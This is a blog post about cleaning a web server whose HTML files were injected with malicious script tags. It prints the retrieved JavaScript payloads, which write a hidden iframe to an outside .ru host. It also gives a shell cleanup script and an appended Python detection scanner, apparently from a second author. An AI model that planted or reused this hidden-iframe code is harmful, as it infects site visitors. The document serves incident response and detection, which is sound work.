Wednesday, August 06, 2008

Malware Attack, Part 2

As I mentioned in yesterday's blog, the server was under malware attack again. This time I realised that 700+ HTML files had the embedded "<script>...</script>" reference injected. Worse, the pattern was repeated 3-4 times on the same line with different script references. Also, I realised that the owner of the files had been changed to 'root' instead of the real owner.

I found 3 unique script references, and they all used the same IFRAME approach to plant the attack:

$ curl http://www.porv.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

$ curl http://www.8hcs.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

$ curl http://www.uhwc.ru/js.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ibse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

I also modified my previous script to match the script reference with a regular expression in grep and sed. I need to ensure the substitution is done globally (i.e., the "g" modifier) in sed, since the reference appears several times on one line. BTW, the "-i" flag did not work with extended regular expressions in sed, so I have to go through a temp file. Here is the modified script:

#! /bin/sh

# Matches one injected tag at a time: [^>]+ stops at the closing '>' so a line
# carrying several references is handled tag by tag (a greedy .+ would delete
# everything between the first and the last tag on that line).
PATTERN='<script src=http://\w+\.(\w+\.)+\w+/[^>]+\.js></script>'
TMPFILE=".tmp-$$"

# Read one path per line so file names containing spaces survive.
find . -type f \( -name "*.html" -o -name "*.htm" \) | while IFS= read -r i
do
        if grep -E "$PATTERN" "$i" > /dev/null 2>&1; then
                printf 'Removing malware in %s ... ' "$i"
                # -r enables extended regular expressions; "g" removes every
                # occurrence on the line, not just the first.
                sed -r -e "s#$PATTERN##g" "$i" > "$TMPFILE"
                if grep -E "$PATTERN" "$TMPFILE" > /dev/null 2>&1; then
                        echo "*** NOT OK ***"
                else
                        # mv replaces the inode, so the cleaned file takes this
                        # user's ownership and umask; use cat "$TMPFILE" > "$i"
                        # instead if the original owner and mode must be kept.
                        mv "$TMPFILE" "$i"
                        echo "Ok."
                fi
        fi
done
rm -f "$TMPFILE"
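To show the detection side of the same cleanup, here is an added Python scanner (my example, not the author's script): it lists the injected script URLs per file, flags files now owned by root, and strips the tags one at a time so that legitimate markup sitting between two injected tags survives. The sample HTML is constructed, reusing only the three hostnames quoted above.

```python
import os
import re
import sys

# Constructed sample (not from the server): one line carrying three injected
# references from different hosts, with legitimate markup between two of them.
SAMPLE_HTML = (
    '<html><body><p>Welcome</p>\n'
    '<script src=http://www.porv.ru/js.js></script>'
    '<script src=http://www.8hcs.ru/js.js></script>'
    '<a href="/about.html">About</a>'
    '<script src=http://www.uhwc.ru/js.js></script>\n'
    '</body></html>\n'
)

# One injected tag per match: the character classes stop at whitespace and '>',
# so a line with several tags is handled tag by tag. A greedy '.+' in the path
# would swallow everything between the first and the last tag on the line.
INJECTED = re.compile(
    r'<script src=(http://[A-Za-z0-9_.-]+/[^\s>]+\.js)></script>')

def find_injected(html):
    """Return the script URLs injected into the given HTML text, in order."""
    return INJECTED.findall(html)

def strip_injected(html):
    """Remove the injected tags only; all surrounding markup is preserved."""
    return INJECTED.sub('', html)

def scan_tree(root):
    """Map each infected .html/.htm file under root to (urls, owned_by_root).

    Ownership is reported because the incident left the files owned by root.
    """
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(('.html', '.htm')):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                urls = find_injected(fh.read())
            if urls:
                hits[path] = (urls, os.stat(path).st_uid == 0)
    return hits

if __name__ == '__main__':
    top = sys.argv[1] if len(sys.argv) > 1 else '.'
    for path, (urls, by_root) in scan_tree(top).items():
        print(path, len(urls), sorted(set(urls)), 'owner=root' if by_root else '')
```

Run it against the web root before the cleanup script to get a count of infected files and the set of distinct hosts, and again afterwards to confirm nothing was missed.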
